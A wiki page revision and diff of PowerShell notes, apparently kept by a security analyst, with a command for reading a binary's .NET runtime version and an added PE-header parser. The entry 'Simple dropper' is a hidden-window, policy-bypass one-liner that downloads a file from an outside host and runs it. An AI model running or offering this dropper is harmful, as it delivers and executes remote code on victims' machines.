PowerShell: Difference between revisions
(Page created with « Simple dropper powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Te... ») |
|||
Line 2: | Line 2: | ||
powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Temp\image.png'); Start-Process('C:\Users\admin\AppData\Local\Temp\image.png') |
powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Temp\image.png'); Start-Process('C:\Users\admin\AppData\Local\Temp\image.png') |
||
+ | |||
+ | |||
+ | |||
+ | Find the framework version of a binary |
||
+ | [Reflection.Assembly]::ReflectionOnlyLoadFrom("C:\Users\futex\Desktop\test.exe").ImageRuntimeVersion |
||
+ | v2.0.50727 |
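Review bot: the added `ReflectionOnlyLoadFrom` line gives no hint that the assembly stays loaded in the PowerShell session, with the file locked, until the session ends, which matters when `test.exe` is a sample you still need to move, hash or delete. Suggest adding a one-line remark to that effect, and marking `v2.0.50727` as the command's output (for example "Output: v2.0.50727") so it is not read as a second command.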
Revision as of 16:40, 31 October 2017
Simple dropper
powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Temp\image.png'); Start-Process('C:\Users\admin\AppData\Local\Temp\image.png')
Find the framework version of a binary
[Reflection.Assembly]::ReflectionOnlyLoadFrom("C:\Users\futex\Desktop\test.exe").ImageRuntimeVersion
v2.0.50727
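Added example, not part of the original wiki page: the same runtime version string can be read straight from the PE headers, so the binary is never loaded into the PowerShell session and native (non-.NET) files simply return nothing. The function name `Get-ClrMetadataVersion` and the folder `C:\samples` are assumptions made for illustration.

```powershell
# Added example, not from the original page; Get-ClrMetadataVersion is a hypothetical name.
function Get-ClrMetadataVersion {
    param([Parameter(Mandatory)][string]$Path)
    # Read raw bytes only: nothing is loaded into the AppDomain and no file lock is kept.
    $b   = [IO.File]::ReadAllBytes((Resolve-Path -LiteralPath $Path).ProviderPath)
    $u16 = { param($o) [BitConverter]::ToUInt16($b, [int]$o) }
    $u32 = { param($o) [BitConverter]::ToUInt32($b, [int]$o) }
    try {
        if ((& $u16 0) -ne 0x5A4D) { return $null }              # DOS magic "MZ"
        $pe = & $u32 0x3C                                        # e_lfanew
        if ((& $u32 $pe) -ne 0x4550) { return $null }            # signature "PE\0\0"
        $nSect = & $u16 ($pe + 6)                                # NumberOfSections
        $opt   = $pe + 24                                        # optional header start
        $sect  = $opt + (& $u16 ($pe + 20))                      # section table start
        switch (& $u16 $opt) {                                   # optional header magic
            0x10B   { $dirs = $opt + 96 }                        # PE32 data directories
            0x20B   { $dirs = $opt + 112 }                       # PE32+ data directories
            default { return $null }
        }
        if ((& $u32 ($dirs - 4)) -lt 15) { return $null }        # NumberOfRvaAndSizes too small
        $cliRva = & $u32 ($dirs + 14 * 8)                        # directory 14 = CLI header
        if ($cliRva -eq 0) { return $null }                      # native image, no CLR header
        $toOffset = {                                            # map an RVA to a file offset
            param($rva)
            for ($i = 0; $i -lt $nSect; $i++) {
                $s  = $sect + 40 * $i
                $va = & $u32 ($s + 12)
                $sz = [Math]::Max((& $u32 ($s + 8)), (& $u32 ($s + 16)))
                if ($rva -ge $va -and $rva -lt $va + $sz) { return $rva - $va + (& $u32 ($s + 20)) }
            }
            throw 'RVA not mapped by any section'
        }
        $cli  = & $toOffset $cliRva
        $meta = & $toOffset (& $u32 ($cli + 8))                  # CLI header +8 = metadata RVA
        if ((& $u32 $meta) -ne 0x424A5342) { return $null }      # metadata root magic "BSJB"
        $len  = & $u32 ($meta + 12)                              # padded version string length
        return [Text.Encoding]::UTF8.GetString($b, $meta + 16, $len).TrimEnd([char]0)
    } catch { return $null }                                     # truncated or malformed headers
}

# Constructed usage: list the CLR version of every file in a folder (placeholder path).
Get-ChildItem -LiteralPath 'C:\samples' -File | ForEach-Object {
    [pscustomobject]@{ File = $_.Name; ClrVersion = Get-ClrMetadataVersion -Path $_.FullName }
}
```

For a binary like the one on this page the `ClrVersion` column would read `v2.0.50727`; an empty value means the file carries no CLR header.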